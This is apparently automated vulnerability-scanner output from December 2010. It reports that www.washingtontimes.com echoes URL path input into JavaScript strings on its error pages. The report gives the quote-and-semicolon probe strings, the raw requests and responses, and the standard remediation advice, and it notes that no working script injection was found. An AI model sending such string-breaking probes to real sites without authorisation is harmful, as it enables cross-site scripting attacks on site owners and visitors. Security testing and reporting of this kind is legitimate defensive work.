Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion99e83"%3b5c06b0c9a1e/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14751 Date: Mon, 13 Dec 2010 21:28:33 GMT X-Varnish: 570577726 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion99e83";5c06b0c9a1e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20e26'%3b16a79618ec3 was submitted in the REST URL parameter 1. This input was echoed as 20e26';16a79618ec3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion20e26'%3b16a79618ec3/editorials/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14569 Date: Mon, 13 Dec 2010 21:27:23 GMT X-Varnish: 570576225 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97820"%3b242275b6969 was submitted in the REST URL parameter 1. This input was echoed as 97820";242275b6969 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion97820"%3b242275b6969/editorials/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14569 Date: Mon, 13 Dec 2010 21:27:21 GMT X-Varnish: 570576197 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion97820";242275b6969"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82df8"%3b445ce5b929 was submitted in the REST URL parameter 1. This input was echoed as 82df8";445ce5b929 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion82df8"%3b445ce5b929/kuhner/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14763 Date: Mon, 13 Dec 2010 21:30:08 GMT X-Varnish: 570579678 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion82df8";445ce5b929"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bc58'%3b9046ee8ccfb was submitted in the REST URL parameter 1. This input was echoed as 2bc58';9046ee8ccfb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion2bc58'%3b9046ee8ccfb/kuhner/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:30:31 GMT X-Varnish: 570579900 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5ee0'%3b4204e92570a was submitted in the REST URL parameter 1. This input was echoed as f5ee0';4204e92570a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf5ee0'%3b4204e92570a/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:28:30 GMT X-Varnish: 570577664 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b533"%3b74741faa0e8 was submitted in the REST URL parameter 1. This input was echoed as 3b533";74741faa0e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion3b533"%3b74741faa0e8/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14768 Date: Mon, 13 Dec 2010 21:28:07 GMT X-Varnish: 570577178 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion3b533";74741faa0e8"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce0f8'%3b083cb55fe87 was submitted in the REST URL parameter 1. This input was echoed as ce0f8';083cb55fe87 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionce0f8'%3b083cb55fe87/mastio/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14768 Date: Mon, 13 Dec 2010 21:30:18 GMT X-Varnish: 570579890 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30d39"%3b7146f514f8f was submitted in the REST URL parameter 1. This input was echoed as 30d39";7146f514f8f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion30d39"%3b7146f514f8f/mastio/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14569 Date: Mon, 13 Dec 2010 21:30:01 GMT X-Varnish: 570579400 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion30d39";7146f514f8f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f790'%3bd80e156fd18 was submitted in the REST URL parameter 1. This input was echoed as 1f790';d80e156fd18 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1f790'%3bd80e156fd18/nugent/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14768 Date: Mon, 13 Dec 2010 21:30:05 GMT X-Varnish: 570579492 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a405a"%3b2ccc25c0640 was submitted in the REST URL parameter 1. This input was echoed as a405a";2ccc25c0640 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona405a"%3b2ccc25c0640/nugent/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14583 Date: Mon, 13 Dec 2010 21:29:41 GMT X-Varnish: 570578852 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opiniona405a";2ccc25c0640"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b26'%3ba4e5ab55b19 was submitted in the REST URL parameter 1. This input was echoed as e8b26';a4e5ab55b19 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productse8b26'%3ba4e5ab55b19/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14591 Date: Mon, 13 Dec 2010 21:37:45 GMT X-Varnish: 570590180 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 827ab"%3b15eb5b6c73 was submitted in the REST URL parameter 1. This input was echoed as 827ab";15eb5b6c73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products827ab"%3b15eb5b6c73/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:37:27 GMT X-Varnish: 570589965 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="products827ab";15eb5b6c73"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c48a"%3b042a1643298 was submitted in the REST URL parameter 1. This input was echoed as 6c48a";042a1643298 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration6c48a"%3b042a1643298/register/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14769 Date: Mon, 13 Dec 2010 21:37:42 GMT X-Varnish: 570590113 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]...
window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="registration6c48a";042a1643298"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a585'%3b4bb7f723b0b was submitted in the REST URL parameter 1. This input was echoed as 1a585';4bb7f723b0b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration1a585'%3b4bb7f723b0b/register/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14775 Date: Mon, 13 Dec 2010 21:37:57 GMT X-Varnish: 570590571 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dcc2"%3b014c762bb9d was submitted in the REST URL parameter 1. This input was echoed as 4dcc2";014c762bb9d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports4dcc2"%3b014c762bb9d/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:31:06 GMT X-Varnish: 570580960 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports4dcc2";014c762bb9d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38e13'%3b4375bb808eb was submitted in the REST URL parameter 1. This input was echoed as 38e13';4375bb808eb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports38e13'%3b4375bb808eb/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14564 Date: Mon, 13 Dec 2010 21:31:47 GMT X-Varnish: 570581517 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a171'%3b053bdd86491 was submitted in the REST URL parameter 1. This input was echoed as 1a171';053bdd86491 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports1a171'%3b053bdd86491/baseball/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14746 Date: Mon, 13 Dec 2010 21:31:08 GMT X-Varnish: 570580682 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db4fd"%3bbca7d04b87c was submitted in the REST URL parameter 1. This input was echoed as db4fd";bca7d04b87c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsdb4fd"%3bbca7d04b87c/baseball/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:30:52 GMT X-Varnish: 570580652 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsdb4fd";bca7d04b87c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afbd"%3b2cd1e6d43c0 was submitted in the REST URL parameter 1. This input was echoed as 5afbd";2cd1e6d43c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports5afbd"%3b2cd1e6d43c0/basketball/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14746 Date: Mon, 13 Dec 2010 21:31:07 GMT X-Varnish: 570580969 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports5afbd";2cd1e6d43c0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d979e'%3b0d07eaae8cc was submitted in the REST URL parameter 1. This input was echoed as d979e';0d07eaae8cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsd979e'%3b0d07eaae8cc/basketball/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:31:36 GMT X-Varnish: 570581281 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37a4'%3bbce5628276c was submitted in the REST URL parameter 1. This input was echoed as e37a4';bce5628276c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportse37a4'%3bbce5628276c/football/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14763 Date: Mon, 13 Dec 2010 21:32:30 GMT X-Varnish: 570582428 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29226"%3bdb736c53825 was submitted in the REST URL parameter 1. This input was echoed as 29226";db736c53825 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports29226"%3bdb736c53825/football/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
